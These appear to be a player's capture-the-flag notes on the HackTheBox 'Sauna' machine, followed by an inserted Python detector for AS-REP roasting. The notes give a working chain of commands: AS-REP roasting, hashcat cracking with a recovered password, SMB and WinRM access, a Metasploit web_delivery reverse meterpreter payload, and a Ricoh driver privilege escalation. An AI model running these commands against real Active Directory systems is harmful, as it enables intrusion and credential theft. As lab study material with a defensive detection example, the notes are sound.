Sauna

Nmap scan:

  • Kerberos
    • Kerberoast?
    • What I did wrong:
      • You can AS-REP roast potential usernames (taken from a user page) with no password to gain access
  • SMB secure
    • Can we find user to access it?
  • Website (Microsoft IIS)
    • Can we gain access from here?
    • default credentials?
    • can we use evil winrm (port 5985)?

Kerberoast (AS-REP roast) with no pass:

GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.local/fsmith

hash:

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:d1bcd5f3625c7b622add478d8fa2ba78$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

Can we crack it?

hashcat -m 13100 egoHash.txt rockyou.txt -O

13100 didn’t work. krb5asrep is 18200!

Find the right mode with:

hashcat --help | grep Kerberos
hashcat -m 18200 egoHash.txt rockyou.txt -O

cracked user:

fsmith:Thestrokes23
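The three notes above (the `-no-pass` request working against fsmith, the `$krb5asrep$23$` hash, and the 18200 vs 13100 mode mix-up) all come down to one account setting and one event on the domain controller. The following is an added example, not part of the original notes, showing the defender-side view: classify a captured hash by its hashcat signature, list accounts whose `userAccountControl` has the DONT_REQ_PREAUTH bit (the condition that lets an AS-REQ succeed without a password), and flag Security Event 4768 records with PreAuthType 0 and RC4 (etype 0x17) ticket encryption, which is what an AS-REP roast leaves behind. The `key=value` event rendering, the sample `userAccountControl` values, the `jdoe` account and the 192.0.2.x client addresses are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# userAccountControl flag "Do not require Kerberos preauthentication" (decimal 4194304).
# Accounts with this bit set answer an AS-REQ without a password, which is what
# GetNPUsers.py -no-pass relies on.
DONT_REQ_PREAUTH = 0x400000
# Kerberos etype 23 (RC4-HMAC): the "$23$" in the captured hash, the type hashcat cracks.
RC4_HMAC = 0x17
# hashcat signature -> mode, for the two hash families that came up in the notes.
HASHCAT_MODES = {"krb5asrep": 18200, "krb5tgs": 13100}

HASH_RE = re.compile(r"^\$(krb5asrep|krb5tgs)\$(\d+)\$")
FIELD_RE = re.compile(r"(\w+)=(\S+)")


def classify_kerberos_hash(line: str) -> Optional[dict]:
    """Read the hashcat signature to tell AS-REP from TGS hashes and pick the mode."""
    m = HASH_RE.match(line.strip())
    if not m:
        return None
    family, etype = m.group(1), int(m.group(2))
    return {
        "family": family,
        "etype": etype,
        "hashcat_mode": HASHCAT_MODES[family],
        "rc4": etype == RC4_HMAC,
    }


def accounts_without_preauth(uac_by_account: Dict[str, int]) -> List[str]:
    """Accounts whose userAccountControl has DONT_REQ_PREAUTH set (the exposed ones)."""
    return sorted(name for name, uac in uac_by_account.items() if uac & DONT_REQ_PREAUTH)


@dataclass(frozen=True)
class Event4768:
    account: str
    client: str
    pre_auth_type: int
    etype: int


def parse_4768(line: str) -> Optional[Event4768]:
    """Parse one flattened key=value rendering of a 4768 (TGT requested) event."""
    fields = dict(FIELD_RE.findall(line))
    if fields.get("EventID") != "4768":
        return None
    return Event4768(
        account=fields["TargetUserName"],
        client=fields["IpAddress"],
        pre_auth_type=int(fields["PreAuthType"]),
        etype=int(fields["TicketEncryptionType"], 16),
    )


def asrep_roast_suspects(lines: List[str]) -> List[Event4768]:
    """A TGT issued with PreAuthType 0 and RC4 encryption is an offline-crackable AS-REP."""
    suspects = []
    for line in lines:
        ev = parse_4768(line)
        if ev is not None and ev.pre_auth_type == 0 and ev.etype == RC4_HMAC:
            suspects.append(ev)
    return suspects


# Constructed sample data (not taken from the box or the notes).
SAMPLE_UAC = {
    "fsmith": 0x200 | 0x10000 | DONT_REQ_PREAUTH,  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD | no pre-auth
    "hsmith": 0x200 | 0x10000,
    "jdoe": 0x200,
}
SAMPLE_4768 = [
    "EventID=4768 TargetUserName=fsmith IpAddress=::ffff:192.0.2.10 TicketEncryptionType=0x17 PreAuthType=0",
    "EventID=4768 TargetUserName=hsmith IpAddress=::ffff:192.0.2.20 TicketEncryptionType=0x12 PreAuthType=2",
    "EventID=4768 TargetUserName=jdoe IpAddress=::ffff:192.0.2.20 TicketEncryptionType=0x12 PreAuthType=2",
    "EventID=4769 TargetUserName=hsmith IpAddress=::ffff:192.0.2.20 TicketEncryptionType=0x17",
]

if __name__ == "__main__":
    print(classify_kerberos_hash("$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:00$00"))
    print("pre-auth disabled:", accounts_without_preauth(SAMPLE_UAC))
    for ev in asrep_roast_suspects(SAMPLE_4768):
        print(f"AS-REP roasting suspect: {ev.account} requested from {ev.client}")
```

The sample data mirrors the notes: fsmith has pre-authentication disabled and shows up as a suspect, hsmith does not, which is why the second `-no-pass` attempt below got nothing. The fix on the directory side is clearing the "Do not require Kerberos preauthentication" flag (or moving the account off RC4), and the 4768 rule is what a SIEM would alert on in the meantime.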

Pass the hash?:

cme smb 192.168.218.0/24 -u fsmith -H Thestrokes23 --local-auth

No, -H has to be an NTLM hash (we need to crack the hash to

SAM Dump:

cme smb 10.10.10.175 -u fsmith -H Thestrokes23 --local-auth --sam

TGS?

EGOTISTICAL-BANK.local/fsmith

sudo GetUserSPNs.py EGOTISTICAL-BANK.local/fsmith:Thestrokes23 -dc-ip 10.10.10.175 -request

Didn’t work but we found HSmith. Can we kerberoast it?

GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.local/hsmith

no

Didn’t work. SMB with user?

enumerate smb shares:

cme smb -u 'fsmith' -p 'Thestrokes23' --shares 10.10.10.175

Access the readable shares:

smbclient \\\\10.10.10.175\\NETLOGON -U fsmith%Thestrokes23
smbclient \\\\10.10.10.175\\print$ -U fsmith%Thestrokes23
smbclient "\\\\10.10.10.175\\RICOH Aficio SP" -U fsmith%Thestrokes23

That's a printer, not a folder! Exploit?

On Metasploit: the Ricoh driver privesc module needs an existing session. Which ports are open on the server?

NEW:

What is WinRM? Port 5985

WinRM | Metasploit Documentation

Gaining access with Metasploit isn't working. Gain a normal shell first, then use web_delivery?

Update?

use scanner/winrm/winrm_login
run http://fsmith:Thestrokes23@10.10.10.175:5985

Um

set domain EGOTISTICAL-BANK.local
set username fsmith
set password Thestrokes23
set rhost 10.10.10.175
run http://fsmith:Thestrokes23@10.10.10.175:5985

still a no

evil winrm:

evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

We get a PowerShell shell.

Use it to pivot into Metasploit (web_delivery):

msfconsole
use exploit/multi/script/web_delivery
set lhost tun0
set payload windows/meterpreter/reverse_http
# target 2 is PSH (PowerShell)
set target 2
set srvport 6999
run -j
sessions -i 1

It hangs. x64?

set payload windows/x64/meterpreter/reverse_http

Worked!

Background the session and try the escalation (gain access as the user, then escalate with the Ricoh driver module):

use windows/local/ricoh_driver_privesc
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4445
set session 1
run

Hanging. Try something faster and come back to this if it’s not working?

Exploit suggester:

use post/multi/recon/local_exploit_suggester
 1   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_sdclt                          Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!                                                                                                                                     
 5   exploit/windows/local/cve_2020_1048_printerdemon               Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/cve_2020_1337_printerdemon               Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/cve_2020_17136                           Yes                      The target appears to be vulnerable. A vulnerable Windows 10 v1809 build was detected!                                                                                                                               
 8   exploit/windows/local/cve_2021_40449                           Yes                      The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!                                                                                                                                     
 9   exploit/windows/local/cve_2022_21882_win32k                    Yes                      The target appears to be vulnerable.
 10  exploit/windows/local/cve_2022_21999_spoolfool_privesc         Yes                      The target appears to be vulnerable.
 11  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 12  exploit/windows/local/ricoh_driver_privesc                     Yes                      The target appears to be vulnerable. Ricoh driver directory has full permissions                

Purple worked!